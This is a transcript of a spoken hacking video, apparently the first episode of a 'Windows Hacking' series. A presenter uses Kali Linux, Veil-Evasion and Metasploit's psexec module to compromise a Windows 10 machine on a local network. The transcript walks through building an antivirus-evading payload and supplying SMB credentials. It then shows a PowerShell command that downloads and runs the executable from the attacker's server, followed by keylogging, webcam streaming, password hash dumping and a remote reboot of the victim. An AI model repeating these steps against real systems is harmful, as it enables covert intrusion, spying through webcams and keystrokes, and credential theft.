Hello, everybody. Today I will be starting a new series. It is called Windows Hacking, where essentially I will be showing off ways of hacking Windows, specifically Windows 10 in this episode. Today we are using, as you can probably see, Kali Linux, and I will be showing you how to hack into Windows 10 without any user interaction. All they have to do is be on their network. Now, there are some downsides as since it is on Windows 10, this works pretty much flawlessly on older versions of Windows, but on Windows 10, the firewall has to be disabled as well as a registry key has to be added. But on other versions of Windows, this should work just fine. So I've already done all of the prerequisites to it, so now we can go ahead and get started. So what we're going to need is 4 terminals opened, and I'll be back once I'm done doing that. Okay, so we are back. I just opened up 4 terminals. Now keep in mind, this isn't a tutorial, but if you'd like, you could always follow along. So the first thing that we need to do is we need to start up our Apache server. So service Apache to, it would definitely help if I spelled Apache right, but Apache to start. Um, So yeah, that's gonna go in and start that up and then do it again, just because sometimes it doesn't work. Apache to start. Yeah, start it. Yeah, totally. But start. Okay, so now that's up. Now we need to get our local IP. So ifconfig. So now this is the IP that we're going to be using right here, 192.168.1.143. And also I'm going to get the IP of the victim machine. So I'm going to open up yet another terminal. Type in net discover. And then right here we're gonna wait for it to all boot, and then hang on, Control V or Control C, and then right here 192.168.1.161 is our victim. Right here it is an HP machine. So we're gonna go up here. We're gonna boot up into Veil Evasion. So hang on, ls. So I have Veil Evasion right here. CD /root /veil evasion and python ./veil evasion.py. So this is going to boot into Veil. Now the reason why we're using Veil is because there is antivirus on the machine that we're attacking, so we need to bypass that antivirus. So we're going to use 34. Actually, while we're doing this, I can boot up one of the. We're going to need 2 Metasploits open. So I'm opening up MSF console. So basically 34, the payload 34 is a Python handler. So it's a Python basically keylogger. So it's a lot more stealthy than just normal reverse TCP keyloggers, as Windows doesn't really know how to differentiate that. So we're going to go ahead and set lhost, and then our IP, which is 192.168.1.143, 192.168.1.143. Set lhost, then set lport 4444. That's what we're using. And then last but not least, set use _pyheron. Definitely also help if I spelled the word use correctly. Y, so now we're using that. So then we need to generate. Now this is, for those of you who don't know, this is just the file that we're going to be basically forcing the victim PC to download and execute, so we have control over the PC. So I'm just going to call it 143. And then I want to encode it with py installer. So now we're going to come over here. Okay, so now that we have a Metasploit open, now we're going to go ahead and get a CMD shell. I can also go ahead and open up this Metasploit console, MSF console. Okay, so now if I go over here, I can now go to use Windows forward slash, or I think it's exploit forward slash exploit forward slash Windows Windows forward slash SMB forward slash PSEXEC. So this is basically a remote exploit thing where you can basically just launch executables on target machines. So now we're going to go ahead and set payload Windows / shell, because we want to get into a shell / reverse _TCP. So now that that's launched, now we're going to wait for this Metasploit console to launch. And as you can see, it's over here creating our exe file. So the other Metasploit is launching right now. So yeah, just have to give it a second. So yeah. So once we're in, we're going to drop into a shell. We're going to use PowerShell to download the file from our Apache server. And then we're going to have basically control over the PC. We can turn on and off the webcam, which I'll do. We can record the mic out of the webcam, but keep in mind I'm recording Audacity right now. So, I mean, there's not much use to doing that. So yeah, and then what else can we do? We can do a whole bunch of stuff. We can do a hash dump where we can get all the hashed passwords and everything. And we can also, the script hasn't been working, but sometimes you can get full-blown, remote desktop, so you can remotely access the computer. You can look at their processes, their IPs, their system info, all sorts of stuff like that. So basically, you own the computer. Okay, so now while this is doing, okay, so that's started up. Okay, so now I need to get this into the Apache server. Exit. So cd /user /share. Yeah, share, I think. Now ls. Now I need to look cd val output. There we go. Now ls. Now we want to go to compile, so / compile, then ls. Now we want to cp, so copy 123 or 143.exe to /var /www /html yeah, I think it's just /html. Then okay, so now cd var /www /html no, there we go. Okay, so now ls. Alright, so now it's in there. Alright, so now if we go over to here, we can drop into the shell. But keep in mind, all of these credentials that I have on the computer, like the password and everything, that's just specifically for this video. All my normal passwords are extremely long, like obnoxiously long, so, you know, it's super fun. Then we need to set our host. So this is the victim machine that we're attacking. Keep in mind, the one that we scanned for, it's 192.168.1.161. Now set l host. Host. 192. This is RIP. Well, I mean, come on. 1.43. There we go. So now we need to set SMB user Jackson. So these are the login credentials for the computer. Set SMB pass echo group 1-2. So yeah, once again, these are just fake credentials that I made up on the spot. What else? So show options. So let's see, what else can we do? I think everything's good to go. So let's go ahead and exploit. So now it's going to go ahead and connect us to a shell. It's going to try and drop us into a shell. Failed unreachable. Hang on a second. Let's go ahead and 192.168. Hang on a second. Let me go over to this machine. CMD ipconfig 161, yeah. So hang on a second. It would definitely help if I set the L port correctly. L port 4444. Now if I try exploiting it, let's see if it works. Exploit. Oh, there we go. Yeah. I didn't set the L port. That's really noobish of me. Okay, so now that's launching. Now I can go ahead and go over here and now set up the handler for the keylogger. Use exploit / multi / handler. There we go. Okay, so now set payload Windows / interpreter / reverse _ TCP. There you go. By the way, soon I will be releasing a tool quite like this where you can generate malware and all that sort of stuff. It's now CD. See, now that we're in a shell, we are now in the backdoor sort of the computer. We're essentially in command prompt. So now PowerShell -command. Okay, so now what this command is it is invoke -web request, and now we want to put in our http :// 192.168.1.143 /143.exe. Or wait, what was the? Yeah, it was 143.exe. So now what this is essentially going to do is this is going to tell the computer to download the file that we made. Out file is going to be 143.exe. So go ahead and let that launch. So now it is going to download the file. So hang on, set payload Windows interpreter. Okay, so I accidentally typed that in wrong. We're gonna have to let it do its thing. Okay, so now by dir. So now where is it? It should be in here. Here it is. As you can see, it is now downloaded on our victim's PC. And I will be switching on over to the victim PC and showing you all that sort of stuff. Or actually, I won't be switching over to the victim's PC because I'm going to do things like shut it down, and you obviously can't record for much longer after you shut down the computer. Just so I can give you proof of concept and everything. So yeah, I'll show you in a second. I just have to wait until we get into here. So now, what is it? It's set lhost 192.168.1. Oh, come on! Why do I keep on doing that? 1.143. There we go. Set L port 4444. Now I think that's pretty much it. Yeah. Exploit. Okay, so now that this is waiting for now it's all it's doing is waiting for it to run. So now we need to PowerShell -command start dash. Come on, stop doing that. It's not even funny anymore. Okay, come on. Yeah, I know it's gonna error out. Yeah, PowerShell -command start process. Where is it? 143.exe. Okay, so now it's going to go ahead and start that process, and it's going to then give us a reverse listener shell into the computer. So as you can see, now it's sending the stages, and then there you go. Now we're in. So if we go ahead and I'll go ahead and switch over to my camera, and I'll show you me doing all that stuff. Okay, so we're back. Right here is the attacker PC. Right here is the victim PC. We've already keylogged it, so as you can see. So now what I can do is I can do things such as webcam _stream. Now if we look over here, as you can see, the webcam turns on as soon as I hit that. And now if we come over here then you can see that there's me, hi, but you can see that the webcam is now streaming and it is on. So now once I exit out of this, and then as you can see it shuts off. So now, we can do things, we can just do a whole bunch of random things. So if I, type in help, so now we can do all sorts of stuff to the computer, all this stuff. Uh, so, we can get the sysinfo and do all sorts of stuff. So now if we do, last thing I'm going to do in this video is, reboot, and then and now as you can see it'll restart the computer. So yeah, I hope you guys enjoyed this video. Yeah, so if you want more, just tell me. I'll do tutorials and stuff I'll do tutorials and stuff if you guys would like. So yeah, I guess see you guys later. Goodbye.